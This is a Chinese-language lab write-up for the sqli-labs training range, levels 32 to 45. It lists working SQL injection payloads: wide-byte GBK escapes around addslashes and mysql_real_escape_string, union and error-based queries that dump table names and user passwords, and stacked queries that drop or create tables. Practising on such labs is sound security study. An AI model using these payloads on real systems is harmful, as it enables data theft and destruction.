sqli-labs靶场笔记(六)
Less-32【宽字节注入|注释’】
该题使用了自定义函数
下面展示一些 payload
。
id=1%df'and 1=1 %23 //判断注入类型
id=1%df'order by 3 %23 //查看属性列个数
id=-1%df'union select 1,user(),database() %23 //查看数据库用户、数据库名称
iid=-1%df'union select 1,group_concat(0x7e,table_name),3 from information_schema.tables where table_schema=(select database())%23 //爆破表名
id=-1%df' union select 1,group_concat(0x7e,column_name),3 from information_schema.columns where table_schema=(select database())and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1) %23 //爆破属性列
id=-1%df' union select 1,2,group_concat(username,0x7e,password) from users %23 //爆破数据
输入单引号检测,发现单引号被转义,符合宽字节注入攻击
当且仅当数据库的编码为GBK时,可以使用宽字节注入。反斜杠的编码为%5c,而在GBK编码中,%df%5c是一个字,所以单引号成功逃逸
属性列为3
数据库名为security,用为root
爆破表名为email、referers、uagents、users
爆破属性列为id、username、password
最后得到数据库中的数据
Less-33【宽字节注入|注释’】
该题使用了PHP的addslashes()函数
payload和上题一样
Less-34【宽字节注入|报错注入|注释’】
该题使用了PHP的addslashes()函数
下面展示 payload
。
uname=admin&passwd=ers%df'and extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name) from information_schema.columns where table_schema=(select database()))))%23&submit=Submit
在burp上,使用各种命令发现无返回
使用报错注入:
Less-35【报错注入|注释’|联合注入】
该题使用了PHP的addslashes()函数
法一:【报错注入】
下面展示 payload
。
id=1 and extractvalue(1,concat(0x7e,(select database()))) //爆破数据库
id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=(select database())))) //爆破表
法二:【联合注入】
下面展示一些 payload'
。
?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3 //爆破表名
Less-36【联合注入|宽字节注入】
该题使用php中的mysql_real_escape_string()函数
下面展示payload
。
id=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)%23 //爆表
Less-37【宽字节注入|报错注入】
该题使用php中的mysql_real_escape_string()函数
下面展示 payload
。
uname=admin&passwd=admin%df%27and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)))%23&submit=Submit //爆破表
Less-38【堆叠注入|联合注入|'注入】
当使用‘【单引号】是报错,在其后面加多一个;【分号】即没有报错
下面展示 payload
。
法一:【联合注入】
id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3; //爆破表
法二:【堆叠注入】
Less-39【联合查询注入|'替换注入|堆叠注入】
替换’【单引号】为 ` ‘
法一:【嵌套】
下面展示一些 payload
。
id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=(select database())),3 //爆破表
法二:【十六进制】
下面展示 payload
。
id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3 //爆破表
数据库方面的堆叠不展示
Less-40【联合注入|堆叠注入|’)注入】
下面展示payload
。
id=-1') union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3 //爆破表
数据库方面的堆叠不展示
Less-41【联合注入|堆叠注入】
法一:【联合注入】
下面展示 payload
。
id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479),3 //爆破表
法二:【堆叠注入】
Less-42【报错注入|'注入|堆叠注入】
使用order by 语句发现存在错误回显
法一:【报错注入】
下面展示 payload
。
login_user=admin&login_password=admin'and extractvalue(1,concat(0x7e,(select database()))) %23 &mysubmit=Login //爆破数据库
login_user=admin&login_password=admin'and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) %23 &mysubmit=Login //爆破表
法二:【堆叠注入】
下面展示 payload
。
login_user=admin&login_password=admin';drop table test; &mysubmit=Login //删表
Less-43【报错注入|’)注入|堆叠注入】
使用order by 语句发现存在错误回显
法一:【报错注入】
下面展示 payload
。
login_user=admin&login_password=a') and extractvalue(1,concat(0x7e,(select database()))) #&mysubmit=Login //爆数据库
login_user=admin&login_password=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))) %23 &mysubmit=Login //爆破表
法二:【堆叠注入】
下面展示 payload
。
login_user=admin&login_password=admin');create table test like emails %23 &mysubmit=Login //建表
Less-44【'注入|堆叠注入】
没有错误回显,尝试使用Boolean盲注、时间盲注均不可以
下面展示 payload
。
login_user=admin&login_password=admin';drop table test ; %23 &mysubmit=Login //删表
Less-45【’)注入|堆叠注入】
没有报错回显,盲注没有成功
下面展示 payload
。
login_user=admin&login_password=admin');create table test like emails; %23 &mysubmit=Login //建表